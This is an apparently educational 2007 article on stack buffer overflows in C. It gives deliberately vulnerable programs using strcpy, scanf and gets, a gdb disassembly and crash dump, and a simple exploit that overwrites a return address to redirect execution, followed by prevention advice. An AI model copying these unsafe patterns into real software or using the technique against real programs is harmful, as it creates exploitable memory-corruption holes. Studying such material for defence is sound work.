Buffer Overflow

Written by: Suhas Desai; published: April 2007




A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

Buffer overflows are a fertile source of bugs and malicious attacks. They occur when a program attempts to write data past the end of a buffer. A buffer is a contiguous allocated chunk of memory, such as an array or a block of memory referenced through a pointer in C. A limitation of C and C++ is that they perform no automatic bounds checking, so a program can write past the end of a buffer, as in the following example.
Note: All examples were compiled on a Linux platform with an x86 configuration.

  int main()
  {
      int buffer[10];
      buffer[20] = 10;   /* out of bounds: valid indexes are 0 to 9 */
      return 0;
  }

This program compiles and may run without reporting any error, but it attempts to write beyond the memory allocated for the buffer, which leads to unexpected behavior.
Example:

        #include <string.h>

        void function(char *str)
        {
                char buffer[16];
                strcpy(buffer, str);    /* no bounds check: overflows buffer */
        }

        int main()
        {
                char *str = "I am greater than 16 bytes";
                function(str);
                return 0;
        }

This program has undefined behavior, because a string (str) of 27 bytes, including the terminating null, is copied to a location (buffer) that has been allocated only 16 bytes. The extra bytes run past the buffer and overwrite the space allocated for the frame pointer (FP), the return address and so on. This corrupts the process stack. The function used to copy the string is strcpy, which performs no bounds checking. Using strncpy with a limit based on the buffer size would have prevented this corruption of the stack, although strncpy does not add a null terminator when the source is too long, so one must be written explicitly.
Example:

        #include <stdio.h>

        int main()
        {
                char buff[15] = {0};
                printf("Enter your name:");
                scanf("%s", buff);      /* no field width: input length is unchecked */
                return 0;
        }

In this example, the program reads a string from standard input but does not check the string's length. If the string has more than 14 characters, it causes a buffer overflow, because scanf() writes the remaining characters past the end of buff.
Note: One character is always reserved for the null terminator.
The result is most likely a segmentation fault that crashes the program. Under certain conditions, the user will receive a shell prompt after the crash. Even if the shell has restricted privileges, the user can examine the values of environment variables, list the files in the current directory, or probe the network with the ping command.
Writing Buffer Overflow exploits:
1. Example of an exploitable program - Let's assume that we exploit a function like this:

#include <stdio.h>

void lame(void)
{
    char small[30];
    gets(small);              /* unsafe on purpose: no limit on input length */
    printf("%s\n", small);
}

int main()
{
    lame();
    return 0;
}

Compile and disassemble it:

# cc -ggdb program.c -o program
/tmp/cca017401.o: In function `lame':
/root/program.c:1: the `gets' function is 
         dangerous and should not be used.
# gdb program
/* short explanation: gdb, the GNU debugger 
   is used here to read the
   binary file and disassemble it (translate 
   bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 :     pushl  %ebp
0x80484c9 :     movl   %esp,%ebp
0x80484cb :     call     0x80484a0 
0x80484d0 :     leave
0x80484d1 :     ret
(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack 
   right before the ret address */
0x80484a0 :     pushl  %ebp
0x80484a1 :     movl   %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer 
   is 30 characters, but the memory is allocated 
   4byte-wise (because the processor uses 32bit 
   words) this is the equivalent to: char small[30]; */
0x80484a3 :     subl   $0x20,%esp
/* load a pointer to small[30] (the space on 
   the stack, which is located at virtual 
   address 0xffffffe0(%ebp)) on the stack, and 
   call the gets function: gets(small); */
0x80484a6 :    leal      0xffffffe0(%ebp),%eax
0x80484a9 :    pushl   %eax
0x80484aa :    call      0x80483ec 
0x80484af :    addl     $0x4,%esp
/* load the address of small and the address of "%s\n" 
   string on stack and call the print function: 
   printf("%s\n", small); */
0x80484b2 :    leal   0xffffffe0(%ebp),%eax
0x80484b5 :    pushl  %eax
0x80484b6 :    pushl  $0x804852c
0x80484bb :    call   0x80483dc 
0x80484c0 :    addl   $0x8,%esp
/* get the return address, 0x80484d0, from stack 
  and return to that address. you don't see that 
  explicitly here because it is done by the CPU 
  as 'ret' */
0x80484c3 :    leave
0x80484c4 :    ret

End of assembler dump.
1.a. Overflowing the program

# ./program
xxxxxxxxx          <- user input
xxxxxxxxxxxxx
# ./program
xxxxxxxxx          <- user input
xxxxxxxxxxxxx
Segmentation fault (core dumped)
# gdb program core
(gdb) info registers
eax:    0x24          36
ecx:    0x804852f     134513967
edx:    0x1           1
ebx:    0x11a3c8      1156040
esp:    0xbffffdb8    -1073742408
ebp:    0x787878      7895160

EBP is 0x787878, which means that we have written more data onto the stack than the input buffer could hold; 0x78 is the hexadecimal representation of 'x'. The process had a buffer of at most 32 bytes. We wrote more data into memory than was allocated for user input and therefore overwrote EBP and the return address with 'xxxx', and the process tried to resume execution at address 0x787878, which caused a segmentation fault.
1.b. Changing the return address
Let's try to exploit the program so that it returns into the call to lame() instead of returning normally. All we have to do is change the return address from 0x80484d0 to 0x80484cb. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program that writes the 4-byte return address repeatedly into a character buffer (an array of 1-byte elements):

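#include <stdio.h>
#include <string.h>

int main()
{
    unsigned int addr = 0x80484cb;   /* address of "call lame" in main */
    char buf[45];
    int i;

    for (i = 0; i <= 40; i += 4)
        memcpy(&buf[i], &addr, 4);   /* 4-byte address, little-endian on x86 */
    buf[44] = '\0';                  /* terminate the string for puts() */
    puts(buf);
    return 0;
}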
 
# ./program
test            <- user input
test

Here the program went through the function two times. If an overflow is present, the return address of a function can be changed to alter the program's flow of execution.
Prevention:

1. Always check the bounds of an array before writing data to it. If this is not possible [e.g. when the input is coming from a CGI script], then use functions that limit the number of input characters. For instance, instead of using scanf(), use the fgets() function, which reads characters up to a specified limit.
Example:

        #include <stdio.h>

        int main()
        {
                char buff[15] = {0};
                fgets(buff, sizeof(buff), stdin);   /* reads at most 14 characters */
                return 0;
        }

2. Additionally, the standard string functions have versions that take an explicit size limit. Thus, instead of strcpy(), strcmp() and sprintf(), use strncpy(), strncmp() and snprintf() respectively.

3. Stack execute invalidation:
When the stack is made non-executable, any attempt to execute code residing on the stack causes a segmentation violation. This protection is not easy to apply everywhere, however. Although it is possible on Linux, a few compilers use trampoline functions to implement taking the address of a nested function, and these depend on the system stack being executable. A trampoline is a small piece of code created at run time when the address of a nested function is taken. It normally resides on the stack, in the stack frame of the containing function, and thus requires the stack to be executable.

4. Dynamic run-time checks:
This method relies primarily on safety code being preloaded before an application is executed. The preloaded component can either provide safer versions of the standard unsafe functions, or it can ensure that return addresses are not overwritten. The libsafe library provides secure calls to these functions, even if the function is not available. It makes use of the fact that stack frames are linked together by frame pointers. When a buffer is passed as an argument to any of the unsafe functions, libsafe follows the frame pointers to the correct stack frame. It then checks the distance to the nearest return address, and when the function executes, it makes sure that the address is not overwritten.

About the Author:
Suhas A Desai is working with Tech Mahindra Ltd. In his free time he writes on Open Source and Security. He can be reached at suhasde@techmahindra.com.
